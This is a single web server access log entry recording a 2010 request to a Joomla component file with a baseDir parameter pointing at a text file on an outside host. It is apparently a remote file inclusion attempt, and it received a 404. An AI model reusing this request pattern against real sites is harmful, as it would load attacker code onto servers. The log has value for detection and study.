124.217.242.70 - - [19/Mar/2010:02:20:36 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
